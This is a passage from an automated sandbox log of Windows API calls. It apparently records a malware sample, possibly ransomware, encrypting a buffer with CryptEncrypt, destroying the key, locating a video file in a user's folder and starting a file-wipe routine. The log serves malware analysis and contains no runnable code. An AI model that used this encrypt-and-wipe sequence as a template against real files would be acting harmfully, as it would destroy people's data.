lpMsg=0x87ebe4) returned 0 [0196.874] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0196.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.874] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0196.875] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0196.875] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0196.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0196.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0196.875] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0196.875] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.875] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.875] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0196.875] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.875] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.875] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x4953, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x4960) returned 1 [0196.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0196.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.876] CharLowerBuffW (in: lpsz="byte[18785]", cchLength=0xb | out: lpsz="byte[18785]") returned 0xb [0196.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.876] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.876] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.876] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.876] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0196.876] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.876] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbf32d8*, pdwDataLen=0x87e820*=0x4953, dwBufLen=0x4960 | out: pbData=0xbf32d8*, pdwDataLen=0x87e820*=0x4960) returned 1 [0196.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0196.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.877] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.877] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0196.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0196.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0196.877] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.877] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0196.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0196.877] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0196.877] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0196.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0196.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0196.877] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.877] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.877] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0196.878] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0196.878] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0196.878] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0196.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0196.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0196.878] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.878] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.878] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.878] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0196.878] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.880] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.880] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.880] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0196.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.880] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0196.880] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0196.880] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0196.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.880] CryptDestroyKey (hKey=0x90af98) returned 1 [0196.880] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0196.880] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0196.880] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0196.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0196.880] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0196.880] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0196.880] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0196.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0196.881] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0196.881] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0196.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0196.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0196.881] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0196.881] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0196.881] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0196.881] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0196.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0196.881] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0196.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0196.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0196.881] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0196.881] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0196.881] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.881] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0196.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0196.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.881] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.881] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0196.881] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.882] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.882] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0196.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0196.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0196.882] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0196.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0196.882] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0196.882] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.882] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0196.882] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0196.882] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0196.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0196.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0196.882] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0196.882] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.882] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0196.882] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.882] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0196.882] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.883] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0196.883] FreeLibrary (hLibModule=0x74f20000) returned 1 [0196.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0196.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0196.883] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0196.883] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0196.883] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0196.883] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.884] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.885] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.885] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.885] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0196.885] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0196.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0196.886] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.886] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.886] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1d08a0, ftCreationTime.dwHighDateTime=0x1d5e2cf, ftLastAccessTime.dwLowDateTime=0x7b3a1a70, ftLastAccessTime.dwHighDateTime=0x1d5da72, ftLastWriteTime.dwLowDateTime=0x7b3a1a70, ftLastWriteTime.dwHighDateTime=0x1d5da72, nFileSizeHigh=0x0, nFileSizeLow=0x4953, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="_4X_CNShky.mkv", cAlternateFileName="_4X_CN~1.MKV")) returned 0x90ae18 [0196.886] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0196.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0196.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0196.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0196.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0196.886] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.886] CharLowerBuffW (in: lpsz="byte[18771]", cchLength=0xb | out: lpsz="byte[18771]") returned 0xb [0196.887] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.887] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0196.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0196.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0196.887] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0196.887] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0196.887] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0196.887] FreeLibrary (hLibModule=0x75c90000) returned 1 [0196.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0196.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0196.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0196.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0196.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0196.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0196.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0196.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0196.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0196.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0196.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0196.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0196.888] 